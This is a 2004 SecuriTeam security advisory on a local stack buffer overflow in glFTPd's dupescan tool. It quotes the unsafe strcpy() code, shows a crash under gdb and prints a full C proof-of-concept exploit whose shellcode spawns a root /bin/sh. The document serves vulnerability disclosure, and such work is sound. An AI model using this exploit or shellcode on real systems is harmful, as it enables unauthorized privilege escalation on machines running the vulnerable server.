Date: 22 Sep 2004 18:37:49 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [UNIX] glFTPd Local Stack Buffer Overflow
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
glFTPd Local Stack Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://www.glftpd.com> glFTPd is a very advanced ftp server with lots of
possibilities. One of the main differences between many other ftp servers
and glFTPd is that it has its own user database which can be completely
maintained online using ftp site commands. Using ftp site commands it is
also possible to see stats, view logs, execute scripts and do many more
things. glFTPd runs within a chroot environment which makes it relatively
safe. The glFTPd team continuously works on improving this free piece of
beautiful software.
Due to an unsafe copying of parameters from the command line using
strcpy() it is possible to overflow a local buffer and cause gIFTPd to
crash.
DETAILS
Vulnerable Systems:
* gIFTPd version 2.00 RC3 and prior
The vulnerability exists because of an unsafe usage of the strcpy()
function. Thus, a buffer overflow condition is possible which allows a
local user to perform privilege escalation. The problematic code is:
39: int main (int argc, char *argv[]) {
40: FILE *fp;
41: char dupename[255], dupefile[255], Temp[255];
42: struct dupefile buffer;
43: if (argc == 1){
44: printf("USAGE: %s <filename>\n", argv[0]);
45: return 0;
46: }
47:
48: read_conf_datapath(Temp);
49: sprintf(dupefile, "%s/logs/dupefile", Temp);
50:
51: strcpy(dupename, argv[1]); <----- THE BUG
52: if((fp = fopen(dupefile, "r")) == NULL)
53: return 0;
54:
In order to demonstrate the issue, perform the following:
coki@nosystem:~$ /glftpd/bin/dupescan `perl -e 'print "A" x 300'`
Done
Segmentation fault
coki@nosystem:~$
coki@nosystem:~$ gdb /glftpd/bin/dupescan
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host
libthread_db library "/lib/libthread_db.so.1".
(gdb) r `perl -e 'print "A" x 300'`
Starting program: /glftpd/bin/dupescan `perl -e 'print "A" x 300'`
Done
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) quit
The program is running. Exit anyway? (y or n) y
coki@nosystem:~$
Exploit
/* glFTPd local stack buffer overflow exploit
(Proof of Concept)
Tested in Slackware 9.0 / 9.1 / 10.0
by CoKi <[email protected]>
No System Group - http://www.nosystem.com.ar
*/
#include <stdio.h>
#include <strings.h>
#include <unistd.h>
#define BUFFER 288 + 1
#define PATH "/glftpd/bin/dupescan"
char shellcode[]=
"\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(void) {
char *env[3] = {shellcode, NULL};
char buf[BUFFER], *path;
int *buffer = (int *) (buf);
int i;
int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH);
for(i=0; i<=BUFFER; i+=4)
*buffer++ = ret;
printf("\n glFTPd local stack buffer overflow (Proof of
Concept)\n");
printf(" by CoKi <[email protected]>\n\n");
execle(PATH, "dupescan", buf, NULL, env);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> CoKi.
The original article can be found at:
<http://www.nosystem.com.ar/advisories/advisory-05.txt>
http://www.nosystem.com.ar/advisories/advisory-05.txt
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.